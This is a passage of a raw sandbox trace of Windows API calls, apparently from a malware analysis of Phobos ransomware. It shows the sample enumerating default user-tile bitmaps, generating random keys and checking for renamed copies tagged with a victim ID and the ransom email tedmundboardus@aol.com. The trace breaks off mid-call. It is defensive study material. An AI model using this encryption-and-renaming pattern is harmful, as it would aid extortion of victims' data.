0x20 [0112.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.777] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.777] ResetEvent (hEvent=0x278) returned 1 [0112.777] SetEvent (hEvent=0x27c) returned 1 [0112.777] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.778] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.778] CloseHandle (hObject=0x314) returned 1 [0112.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp")) returned 0x20 [0112.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.778] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.778] ResetEvent (hEvent=0x278) returned 1 [0112.778] SetEvent (hEvent=0x27c) returned 1 [0112.778] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.779] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.779] CloseHandle (hObject=0x314) returned 1 [0112.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp")) returned 0x20 [0112.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.779] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.779] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.780] ResetEvent (hEvent=0x278) returned 1 [0112.780] SetEvent (hEvent=0x27c) returned 1 [0112.780] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.780] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.780] CloseHandle (hObject=0x314) returned 1 [0112.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp")) returned 0x20 [0112.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.780] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.781] ResetEvent (hEvent=0x278) returned 1 [0112.781] SetEvent (hEvent=0x27c) returned 1 [0112.781] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.781] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.781] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.781] CloseHandle (hObject=0x314) returned 1 [0112.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp")) returned 0x20 [0112.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.781] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.781] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.782] ResetEvent (hEvent=0x278) returned 1 [0112.782] SetEvent (hEvent=0x27c) returned 1 [0112.782] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.782] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.782] CloseHandle (hObject=0x314) returned 1 [0112.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp")) returned 0x20 [0112.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.782] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.783] ResetEvent (hEvent=0x278) returned 1 [0112.783] SetEvent (hEvent=0x27c) returned 1 [0112.783] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.784] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.784] CloseHandle (hObject=0x314) returned 1 [0112.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp")) returned 0x20 [0112.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.784] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.784] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.784] ResetEvent (hEvent=0x278) returned 1 [0112.784] SetEvent (hEvent=0x27c) returned 1 [0112.784] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.784] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.785] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.785] CloseHandle (hObject=0x314) returned 1 [0112.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp")) returned 0x20 [0112.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.785] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.785] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.785] ResetEvent (hEvent=0x278) returned 1 [0112.785] SetEvent (hEvent=0x27c) returned 1 [0112.785] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.785] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.786] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.786] CloseHandle (hObject=0x314) returned 1 [0112.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp")) returned 0x20 [0112.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.786] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.786] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.786] ResetEvent (hEvent=0x278) returned 1 [0112.786] SetEvent (hEvent=0x27c) returned 1 [0112.786] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.786] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.786] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.787] CloseHandle (hObject=0x314) returned 1 [0112.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp")) returned 0x20 [0112.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.787] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.787] ResetEvent (hEvent=0x278) returned 1 [0112.787] SetEvent (hEvent=0x27c) returned 1 [0112.787] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.788] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.788] CloseHandle (hObject=0x314) returned 1 [0112.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp")) returned 0x20 [0112.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.788] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.789] ResetEvent (hEvent=0x278) returned 1 [0112.789] SetEvent (hEvent=0x27c) returned 1 [0112.789] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.789] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.789] CloseHandle (hObject=0x314) returned 1 [0112.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp")) returned 0x20 [0112.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.789] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.790] ResetEvent (hEvent=0x278) returned 1 [0112.790] SetEvent (hEvent=0x27c) returned 1 [0112.790] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.790] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.790] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.790] CloseHandle (hObject=0x314) returned 1 [0112.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp")) returned 0x20 [0112.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.790] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.790] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.791] ResetEvent (hEvent=0x278) returned 1 [0112.791] SetEvent (hEvent=0x27c) returned 1 [0112.791] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.791] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.791] CloseHandle (hObject=0x314) returned 1 [0112.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp")) returned 0x20 [0112.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.793] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.794] ResetEvent (hEvent=0x278) returned 1 [0112.794] SetEvent (hEvent=0x27c) returned 1 [0112.794] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.795] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.795] CloseHandle (hObject=0x314) returned 1 [0112.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp")) returned 0x20 [0112.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.795] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.795] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.795] ResetEvent (hEvent=0x278) returned 1 [0112.796] SetEvent (hEvent=0x27c) returned 1 [0112.796] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.796] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.796] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.796] CloseHandle (hObject=0x314) returned 1 [0112.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp")) returned 0x20 [0112.796] GetFileAttributesW 